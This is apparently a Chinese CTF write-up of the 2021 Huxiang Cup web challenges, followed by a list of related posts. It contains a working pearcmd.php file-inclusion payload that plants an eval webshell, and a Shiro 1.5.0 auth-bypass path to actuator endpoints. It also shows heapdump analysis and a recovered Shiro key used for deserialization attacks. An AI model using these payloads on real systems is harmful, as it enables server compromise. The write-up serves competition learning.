2021-湖湘杯-Web
前言
总的来说的话,题目质量还是不错的,另外那道XSS也是0解,也幸好自己是一点XSS都不会(寒假补一波),卷是真的卷。还有很多的东西自己对其的认识都只停留在表面吧,还是得慢慢学习。除了shiro的鉴权绕过是自己之前专门学过的,所以打开pom.xml看到1.5.0的版本立马就知道这题得有个鉴权绕过,别的,剩下的打shiro一开始没打通才换了工具打(后来才发现我一直在拿cc的链子打,我说怎么打不通。。。)。还是慢慢学习了。
easywill
打开页面发现是个WillPHP,而且应该就是assign的模板渲染了,而且根据这个东西和tp有点关联,联想到tp的那个assign实现的文件包含。去下载源码跟一下,发现是在这里出现了任意文件包含
public static function renderTo($viewfile, $vars = []) {$m = strtolower(__MODULE__);$cfile = 'view-'.$m.'_'.basename($viewfile).'.php';if (basename($viewfile) == 'jump.html') {$cfile = 'view-jump.html.php';}$cfile = PATH_VIEWC.'/'.$cfile;if (APP_DEBUG || !file_exists($cfile) || filemtime($cfile) < filemtime($viewfile)) {echo "123";$strs = self::compile(file_get_contents($viewfile), $vars);var_dump($cfile);file_put_contents($cfile, $strs);}extract($vars);include $cfile;
但是找不到flag,发现pearcmd.php包含可以利用,直接打就可以了:
GET /?name=cfile&value=/usr/local/lib/php/pearcmd.php&+-c+/tmp/.feng.php+-d+man_dir=<?eval($_POST[0]);?>+-s+ HTTP/1.1
就把马写在了/tmp/.feng.php
,再包含之即可:
Pentest in Autumn
pom.xml里面有个shiro 1.5.0。
打开网站发现没什么东西,扫了一下(bushi)扫到了actuator
,但是很明显需要shiro得鉴权绕过:
/;/actuator/env
找到了这篇文章:https://www.cnblogs.com/icez/p/Actuator_heapdump_exploit.html
利用heapdump找到shiro的key来实现反序列化攻击。通过访问/;/actuator/heapdump
下载下来,然后找key。
但是文章里的那个工具我本地用不了。。。我用了jdk自带的:
D:\environment\jdk8u302-b08\bin>jhat.exe C:\Users\15997\Desktop\heapdump
Reading from C:\Users\15997\Desktop\heapdump...
Dump file created Sun Nov 14 14:39:57 CST 2021
Snapshot read, resolving...
Resolving 286122 objects...
Chasing references, expect 57 dots.........................................................
Eliminating duplicate references.........................................................
Snapshot resolved.
Started HTTP server on port 7000
Server is ready.
经过一番寻找找到了key:
转换一下:
import base64
s= "0xa1, 0x58, 0xba, 0xdd, 0xa3, 0x90, 0xf8, 0x09, 0x2b, 0x92, 0x5e, 0xe4, 0x04, 0x8a, 0x42, 0x34"
print(s.replace(", ","").replace("0x",r"\x"))ss=b'\xa1\x58\xba\xdd\xa3\x90\xf8\x09\x2b\x92\x5e\xe4\x04\x8a\x42\x34'
print(base64.b64encode(ss))
#b'oVi63aOQ+Akrkl7kBIpCNA=='
然后工具直接梭:
2021-湖湘杯-Web相关推荐
- 2021湖湘杯 Hideit Writeup
2021湖湘杯 Hideit AAA : immortal 动态调试 直接x64dbg动调找到了关键的加密代码分别是xxtea 和 chacha20,直接动调从中拿出各种参数然后写代码进行解密.其实一 ...
- 2018湖湘杯web、misc记录
1.题目名 Code Check 打开题目,右键发现有id参数的url,简单base64解码以后发现不是明文,说明利用了其他的加密方式,那么应该会有具体的加密方式给我们,于是试试常见的文件泄露,可以发 ...
- [HXBCTF 2021]湖湘杯easywill
INDEX 0x00 前言 啥是Pear? pear installl pear config-create 关于pearcmd.php 和 register_argc_argv register_a ...
- 2021湖湘杯wp_web
easywill will框架,版本是1.51,直接gitee下载源码回退版本即可https://gitee.com/willphp/willphpv2 该框架参考了thinkphp,开头首页给出了a ...
- 2018湖湘杯海选复赛Writeup
2018湖湘杯Writeup 0x01 签到题 0x02 MISC Flow 0x03 WEB Code Check 0x04 WEB Readflag 0x05 WEB XmeO 0x06 Reve ...
- 2020湖湘杯 wp
2020湖湘杯 wp web 题目名字不重要反正题挺简单的 NewWebsite misc misc2(题目名忘了.....) 总结 昨天打了下湖湘杯,签到选手上线. web 题目名字不重要反正题挺简 ...
- 2020湖湘杯部分writeup
周末打了湖湘杯,把做题过程记录一下,大家交流学习. 下面的链接里有题目,可以下来看看. https://download.csdn.net/download/jameswhite2417/130819 ...
- 湖湘杯2021-pwn-final部分复现
第一次参加awd+,虽然成绩不是很好(大佬太多被打烂了),有很多收获,awd+赛制中可以通过攻击和防御两个手段来得分,攻击的话就是类似于正常的ctf,只不过如果成功攻击后,平台会使用官方的exp来去打 ...
- slax9Linux中文,湖湘杯-WriteUp | CN-SEC 中文网
Web 题目名字不重要反正题挺简单的 解题思路 非预期,DASFLAG变量在phpinfo里显示出来了 NewWebsite 解题思路 http://47.111.104.169:56200/?r=c ...
- 湖湘杯2019两个密码题wp
湖湘杯2019两个密码题wp 还是自己太菜的原因,这次湖湘杯只做出来4道题,然后5点的时候就放弃了去跟同学出去玩了,当时感觉进前50无望(这次湖湘杯py情况也很严重啊,可惜烽火台只报不封,挺恶心的 ...
最新文章
- 《中国式方案秘籍(上部)》
- javascript 控制键盘输入
- thttpd源码分析
- RestTemplate设置通用header
- 一个简单的blog系统(四) 实现用户页面和文章页面
- C语言结构体使用与指针的理解
- C++重载和重写的条件以及重写后对基类函数的覆盖
- Kubernetes-命名空间token(十五)
- 【AI面试题】GBDT原理、如何用于分类、常用损失函数
- 微软Skype推出Slack整合预览版
- 关于EntityManager(实体管理器)的常用方法
- PHP 基于 SW-X 框架,搭建WebSocket服务器(一)
- idea中java导包快捷键_JAVA入门:IntelliJ Idea 常用快捷键
- 2022年低压电工上岗证题库及答案
- SaltStack 日志管理
- 商品库存清单案例(Java)
- ZYNQ Linux 逻辑端(PL)中断demo
- BlueTooth蓝牙协议规范(四)
- html5考试总结300字,考试总结与反思300字
- springboot继承JpaRepository报org.springframework.beans.factory.NoSuchBeanDefinitionException: No qualif
热门文章
- (20)Java基础 --面向对象(1)
- qcy蓝牙耳机怎么串联_qcy蓝牙耳机怎么换去连接另一部手?
- 互联网+红旅赛道校赛决赛观摩部分收获
- PHP中的四舍五入取整,向上取整,向下取整
- 实战:OpenKruise运维增强控制器-2022.3.12
- 魅族android11,安卓11版本升级了,魅族17系列开启内测尝鲜,这功能太棒了
- contos 7新手上路之四:使用与美化
- android 自定义梯形,如何在android中构建一个梯形形状?
- lol峡谷之巅区服务器位置,LOL峡谷之巅地址
- 2020届硕士生年初Android春招实习面试和正式校招面试经验汇总(收割腾讯,百度,美团,网易等offer)